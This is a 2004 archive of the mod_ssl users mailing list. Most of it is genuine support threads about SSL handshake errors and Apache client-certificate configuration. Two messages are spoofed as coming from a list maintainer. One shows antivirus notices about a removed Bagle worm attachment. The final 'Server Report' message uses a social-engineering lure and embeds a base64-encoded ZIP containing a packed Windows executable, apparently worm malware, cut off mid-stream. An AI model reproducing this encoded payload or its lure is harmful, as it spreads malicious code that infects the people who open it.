Received: by master.modssl.org (Postfix, from userid 4003)
	id 6542AA8A4D; Mon, 19 Jan 2004 07:06:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kugane.nims.go.jp (kugane.nims.go.jp [144.213.2.10])
	by master.modssl.org (Postfix) with SMTP id D1CB3A8A4F
	for ; Mon, 19 Jan 2004 07:06:45 +0100 (CET)
Received: (qmail 3167 invoked by uid 94); 19 Jan 2004 15:03:29 +0900
Received: from unknown (HELO sikikusa.nims.go.jp) (144.213.251.14)
  by kugane.nims.go.jp with SMTP; 19 Jan 2004 15:03:29 +0900
Received: from momokusa.nims.go.jp (localhost [127.0.0.1])
	by sikikusa.nims.go.jp (8.12.9/8.12.9) with SMTP id i0J633h9006971
	for ; Mon, 19 Jan 2004 15:03:07 +0900 (JST)
Received: (qmail 18431 invoked by uid 94); 19 Jan 2004 14:03:41 +0900
Received: from hagi1858.nims.go.jp (HELO hagi1858) (144.213.26.156)
  by momokusa.nims.go.jp with SMTP; 19 Jan 2004 14:03:41 +0900
Date: Mon, 19 Jan 2004 14:03:44 +0900
To: modssl-users@modssl.org
Subject: Hi
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------622032315703633"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------622032315703633
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

------------------  Virus Warning Message (on the network)

Found virus WORM_BAGLE.A in file eyhp.exe
The uncleanable file eyhp.exe is moved to /etc/iscan/virus/virLBAumaGMn.

---------------------------------------------------------

----------622032315703633
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Test =)
jwqmtamjchseokccd
--
Test, yep.

----------622032315703633
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


------------------  Virus Warning Message (on the network)

eyhp.exe is removed from here because it contains a virus.

---------------------------------------------------------
----------622032315703633--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 19 12:06:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 42089A8A49; Mon, 19 Jan 2004 12:06:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from embsjh05b.sjk.emb (embsjh05b.embraer.com.br [200.225.90.57])
	by master.modssl.org (Postfix) with ESMTP id 1D358A8959
	for ; Mon, 19 Jan 2004 12:05:46 +0100 (CET)
Importance: High
X-Priority: 1 (High)
Subject: error in error_log httpd+ssl
To: modssl-users@modssl.org
Message-ID: 
From: diego.veiga@embraer.com.br
Date: Mon, 19 Jan 2004 09:05:29 -0200
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: diego.veiga@embraer.com.br
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users







How can i consider it normal??

[Thu Jan 15 15:44:08 2004] [error] System: Connection reset by peer (errno:
104)
[Thu Jan 15 15:46:01 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Thu Jan 15 15:46:01 2004] [error] System: Connection reset by peer (errno:
104)
[Thu Jan 15 15:50:03 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Thu Jan 15 15:50:03 2004] [error] System: Connection reset by peer (errno:
104)
[Thu Jan 15 15:51:15 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Thu Jan 15 15:51:15 2004] [error] System: Connection reset by peer (errno:
104)
[Thu Jan 15 15:52:47 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)



Diego Brito Veiga
Technical Publications
Phone: +55 (12) 39273929
Fax: +55 (12) 39273342

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 25 11:01:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1A677A8947; Sun, 25 Jan 2004 11:01:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dragon.atmos.colostate.edu (dragon.atmos.colostate.edu [129.82.48.30])
	by master.modssl.org (Postfix) with SMTP id 671A8A8937
	for ; Sun, 25 Jan 2004 11:00:44 +0100 (CET)
Received: (qmail 7326 invoked from network); 25 Jan 2004 10:03:06 -0000
Received: from rylos.atmos.colostate.edu (HELO rylos) (129.82.48.47)
  by dragon.atmos.colostate.edu with SMTP; 25 Jan 2004 10:03:06 -0000
Date: Sun, 25 Jan 2004 03:00:40 -0700 (MST)
From: Tony Arcieri 
To: modssl-users@modssl.org
Subject: SSL handshaking problems
Message-ID: <20040125024811.W5943@rylos.atmos.colostate.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tony Arcieri 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello, I'm running Apache from within a FreeBSD 5.2-RELEASE jail in the
following configuration:

Apache/2.0.48 DAV/2 SVN/0.35.1 PHP/4.3.4 mod_ssl/2.0.48 OpenSSL/0.9.7c

OpenSSL and Apache were both built out of ports using libkse threading.
The APR was configured with db4 support which is required for the
Subversion module.

I have tried many different ssl.conf configurations and generating keys in
many different ways, all of which have the same results.

Apache is listening on port 443, but the handshaking process fails.  Here
is the output from an attempted openssl connection:

% openssl s_client -connect localhost:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 080A8280 [080BC000] (148 bytes => 148 (0x94))
0000 - 80 92 01 03 01 00 69 00-00 00 20 00 00 39 00 00   ......i... ..9..
0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0   8..5............
0020 - 00 00 33 00 00 32 00 00-2f 00 00 07 05 00 80 03   ..3..2../.......
0030 - 00 80 00 00 66 00 00 05-00 00 04 01 00 80 08 00   ....f...........
0040 - 80 00 00 63 00 00 62 00-00 61 00 00 15 00 00 12   ...c..b..a......
0050 - 00 00 09 06 00 40 00 00-65 00 00 64 00 00 60 00   .....@..e..d..`.
0060 - 00 14 00 00 11 00 00 08-00 00 06 04 00 80 00 00   ................
0070 - 03 02 00 80 2c d3 fc 74-50 10 30 3b 14 ee 61 ad   ....,..tP.0;..a.
0080 - 33 15 f6 93 19 fe 6e 97-37 5b a2 02 b9 da a5 53   3.....n.7[.....S
0090 - 15 42 25 0c                                       .B%.
SSL_connect:SSLv2/v3 write client hello A
read from 080A8280 [080C2000] (7 bytes => 0 (0x0))
18475:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
failure:s23_lib.c:226:

Any ideas?

Tony Arcieri
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 26 13:05:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 252EBA8958; Mon, 26 Jan 2004 13:05:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from embsjh05b.sjk.emb (embsjh05b.embraer.com.br [200.225.90.57])
	by master.modssl.org (Postfix) with ESMTP id A93DCA8940
	for ; Mon, 26 Jan 2004 13:05:34 +0100 (CET)
Subject: how can i consider it normal?
To: modssl-users@modssl.org
Message-ID: 
From: diego.veiga@embraer.com.br
Date: Mon, 26 Jan 2004 10:05:15 -0200
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: diego.veiga@embraer.com.br
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





[Thu Jan 22 17:02:25 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Thu Jan 22 17:02:27 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Thu Jan 22 17:03:30 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Fri Jan 23 09:48:46 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Fri Jan 23 16:48:35 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)
[Sat Jan 24 09:23:52 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?
!] (System error follows)


Diego Brito Veiga
Technical Publications
Phone: +55 (12) 39274293
Fax: +55 (12) 39273342

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 26 14:20:43 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D4019A8947; Mon, 26 Jan 2004 14:20:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gw.reea.net (reea.ms.fx.ro [193.230.173.18])
	by master.modssl.org (Postfix) with ESMTP id 56367A8934
	for ; Mon, 26 Jan 2004 14:20:20 +0100 (CET)
Received: from reea.net (borkstation.ms.reea.net [192.168.0.19])
	by gw.reea.net (8.12.8/8.12.8) with ESMTP id i0QDWZOM030202
	for ; Mon, 26 Jan 2004 15:32:38 +0200
Message-ID: <4015146C.70300@reea.net>
Date: Mon, 26 Jan 2004 15:21:48 +0200
From: marius popa 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6b) Gecko/20031205 Thunderbird/0.4
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: how can i consider it normal?
References: 
In-Reply-To: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: marius popa 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

diego.veiga@embraer.com.br wrote:
> 
> 
> 
> [Thu Jan 22 17:02:25 2004] [error] mod_ssl: SSL handshake interrupted by
> system [Hint: Stop > !] (System error follows)

I thik the message says it could be a normal ssl client error :stop 
button pressed in browser?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 28 13:28:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 654EBA895E; Wed, 28 Jan 2004 13:28:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from localhost.localdomain (coco.myalert.com [217.115.0.1])
	by master.modssl.org (Postfix) with ESMTP id C4F6CA8937
	for ; Wed, 28 Jan 2004 13:27:57 +0100 (CET)
Received: from www.axe.es (mas-jsanchez.myalert.com [10.65.65.67])
	by localhost.localdomain (8.12.5/8.12.5) with ESMTP id i0SCRsH3006220
	for ; Wed, 28 Jan 2004 13:27:54 +0100
Subject: 
From: Javier Sanchez 
To: modssl 
Content-Type: text/plain
Message-Id: <1075292874.12901.46.camel@mas-jsanchez>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 
Date: Wed, 28 Jan 2004 13:27:54 +0100
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Javier Sanchez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi all,

im trying to configure an apache 2.0 with modssl in roder to restric
access to some dirs using x509 certs.

The thing is that autehntification works, but when i load a new web page
the web server starts teling me that the web page needs authentification
and continuw to do so for almost every image included on the web page.

Should i need to change any session options ???
My config is below.

 

 
        Listen 443
        AddType application/x-x509-ca-cert .crt
        AddType application/x-pkcs7-crl    .crl
        SSLPassPhraseDialog  builtin
        SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
        SSLSessionCacheTimeout  300
        SSLMutex  file:/usr/local/apache/logs/ssl_mutex
        SSLRandomSeed startup builtin
        SSLRandomSeed connect builtin
 
 

 
        DocumentRoot "/var/www/secure"
        ServerName xxx.xxx.xxx
        ServerAdmin xxx@xxx.com
        ErrorLog /usr/local/apache/logs/error_log
        TransferLog /usr/local/apache/logs/access_log
 
        SSLEngine on
 
        SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
        SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
        SSLCertificateKeyFile /usr/local/apache/conf/ssl.crt/server.key
        SSLCACertificateFile /usr/local/apache/conf/ssl.crt/server.crt
        SSLCARevocationFile /usr/local/apache/conf/ssl.crt/server.crl
        SSLVerifyClient require
        SSLVerifyDepth  1
 
        
                SSLRequireSSL
        
 
        SSLOptions +StrictRequire +OptRenegotiate
        
            SSLOptions +StdEnvVars
        
        
            SSLOptions +StdEnvVars
        
 
 
        CustomLog /usr/local/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
 

 






Cheers





-- 
 
------------------------------
Javier Sanchez
Administrador de Sistemas
MyAlert.com
a Buongiorno Vitaminic Company
jsanchez@myalert.com
Telf: +34 91 141 51 00
FAX. +34 91 667 39 51
-------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 29 02:34:46 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 44C00A8963; Thu, 29 Jan 2004 02:34:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from iilcorp.com (ip-228-151-66-202.rev.dyxnet.com [202.66.151.228])
	by master.modssl.org (Postfix) with ESMTP id 9BDDCA8934
	for ; Thu, 29 Jan 2004 02:34:38 +0100 (CET)
Received: from engelschall.com ([219.137.225.8])
	by iilcorp.com (8.11.6/8.11.6) with ESMTP id i0T1YTH26063
	for ; Thu, 29 Jan 2004 09:34:31 +0800
Message-Id: <200401290134.i0T1YTH26063@iilcorp.com>
From: rse@engelschall.com
To: modssl-users@modssl.org
Subject: Server Report
Date: Thu, 29 Jan 2004 09:34:23 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0014_A5BFD337.50D5C4C5"
X-Priority: 3
X-MSMail-Priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0014_A5BFD337.50D5C4C5
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

The message contains Unicode characters and has been sent as a binary attachment.


------=_NextPart_000_0014_A5BFD337.50D5C4C5
Content-Type: application/octet-stream;
	name="text.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="text.zip"

UEsDBAoAAAAAAEsMPTDKJx+eAFgAAABYAAAIAAAAdGV4dC5leGVNWpAAAwAAAAQAAAD//wAAuAAA
AAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAAAAAAAAAAAAAAAAAOAA
DwELAQcAAFAAAAAQAAAAYAAAYL4AAABwAAAAwAAAAABKAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAA
AADQAAAAEAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOjBAAAwAQAA
AMAAAOgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVQ
WDAAAAAAAGAAAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOBVUFgxAAAAAABQAAAAcAAAAFAA
AAAEAAAAAAAAAAAAAAAAAABAAADgLnJzcmMAAAAAEAAAAMAAAAAEAAAAVAAAAAAAAAAAAAAAAAAA
QAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
LjI0AFVQWCEMCQIJSH6Jj9Q2HIEplgAAU04AAACAAAAmAQDF7ocCkgBQJkoAQAP9smmaLBAE9CXo
AQBLzmmabtkfyCrAA7iwqKZpmqagmJCIgJqmaZp4cGhgWFDNYJ9pSABEBzgwNE3TdAMoJBwYENMs
u9cIIwP4KfDoTdM0TeDY0Mi8tDRN0zSspJyUjM42TdOIfHBoKW9cpumawQdUTANEOJqmaZosJBwU
DARpms5t/Ch/A/Ts5KZpmqbc1MzIvJqmaZq0rKSgmJBnm6ZpjIB4cCh7aN5s03UHXANUTCj/+wt2
tvvjQA80KPcsLwOaphn5JChKHBQMBGmazuyb/CcD7OjgpmmaptjUzMjAmqZpurgnsKyooJhpmqZp
lIyIhHykaZqmdGxkXFRpmqYbTANEQDgwpmmapiggGBAImqZzmwD4Js8D6ODYZ5vObVQ0QwNANDTb
iv////+dWtDa5fQGHzNObHJO2AKXX5LIAT18vkNLluQ1ieA6l//////3WsAplQR262PeXN1h6HL/
jyK4Ue2MLtN7JtQNOfCqZ/////8n6rB5RRTmu5NuTC0R+OLPv7KooZ2cnqOrtsTV6QAaN/////9X
eqDJ9SRWi8P+PH3BCFKf70KY8U2sDnPbRrQlmRCKB/////+HCpAZpaWo/vLD0qj4EixKa4+24A09
cKbfG1p84SdVyf////8SYL4YZdU4nhdz4lSJQbya4z/GUI1tAJZPy2oMsUN6sv////9zF86IRwXI
ilcj8sSZcUwuC+/WwK2dkIYPe3p8kYmUov////+zx976FTVYfqfDAjR5odwaW4/mMG3NIHbPK4r8
Ubkkkv////8Dd+5o5WXobpeDg3aMlaGwwtfvCihJbZS+6xtOhL35OP////96vwdSoPFFbJZTsxp8
5VHAMqcfmhiZHaQuu0vedA2pSP/////qjzfikEH1rGYj46ZsNQHQondPKgjpzbSei3tuZF1ZWP//
//9aX2dygJGlvNbzEzZchbHgEkd/uvg5fcQOW6v+VK0JPf////+ad6cCcOFVzAbDQ8Zc1WFhZGpz
f4ygtc3oBidLcpzJ+f////8sYptXFlh9sGAm/iN61DGR5FrDL84Qhf109nf7gAyZKf////+8UuuH
JshtFcBuH5OKROGU1BIh366AVS0Y5ser8nxpWf////9OQjs3ODg9RVBeb4OatNHxFDpjz77w5Wy2
5CNb97xhqP/////QO4nuczxj+JngxUuRF6Eh3iKzPz9USFF7b37Wz9lulf/f/v8pAyPplAm/5vOl
QRCmfDJpa4AhCy3HTtIQgmz5/////3Ond94UhwcH+1KqAWHALJv3Jpbdl50iYA9Gns39LEB/////
/5Oy0vEJIFh2aGNdUFJRU2pkdwEsxe9UMLxXETzOnVdu/////yDjrWDa0VIVzmZft0HAFORlk594
/nINvOdqlXt7E3Z2/////30cDS3y9vSw8dHnefrdTGWj/ydsjN0L24wbqb11hztP/////9sUgkIU
CUXMgg/6Yrcpc/sVg+cek360JGkp/70oy+pO///t/3cOOrC/91TU7HOYAU0GnfKir8Ji8+VeN98F
cVL/////B/gbQH5UPqepTywCfTDI5wbSVCoaa0wBnQT2avodxwb/hf//+B2QBKuWAAYGECvvmdRO
/xd4C5PG+HUhjKT/////X//Mcmvrb/6l/ezQQcl4kdnErCbH6OCptxpdb+wpEKP/////vPPt9W9R
ITWN1lMcSCkY47dcP524zdBSVeO1Q+q+Z+P/////oKAy4s5JOiQvMAqProThdUChYpiy9TBK4OP/
kYHBJwf/////d4hnj1SzhQji/oJFq2GOdNq7Kjiu8ErUGJwXikjCtbz/////nvsfVuZukOA7R7Og
GrfSqrzE95NIpgHABP8GEotdqdj/////vZQx+B/oWmM+39YKykLVDF5gSXL19K70Uxf8FhXyjpr/
////c3A8grHijjdbUxaiJ5RUWKyxNTc+qnVllSFu6xqEgWr/////5goYPzqVn4GC43OkRz0JAtYu
iMKn1T+KXOqfVjtfPUr/0v//w3lfQwm48Kuazh6yhdlLwdQ7Xs/f9kf5Svf/////2PsttIpnYv9Y
rRGMIvdby1jfhfys4GXa65eU4mAI7z//////POPsfxCOYH7dTZvknQUbl3rbzLP7N48l8Tkdsnwa
9R3/////H72f6cbq6es+2ZZw/TvaRSX286Tn1gQhTDn+W6SHiZL///8LndOwW40qNkIbytHkNFCs
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
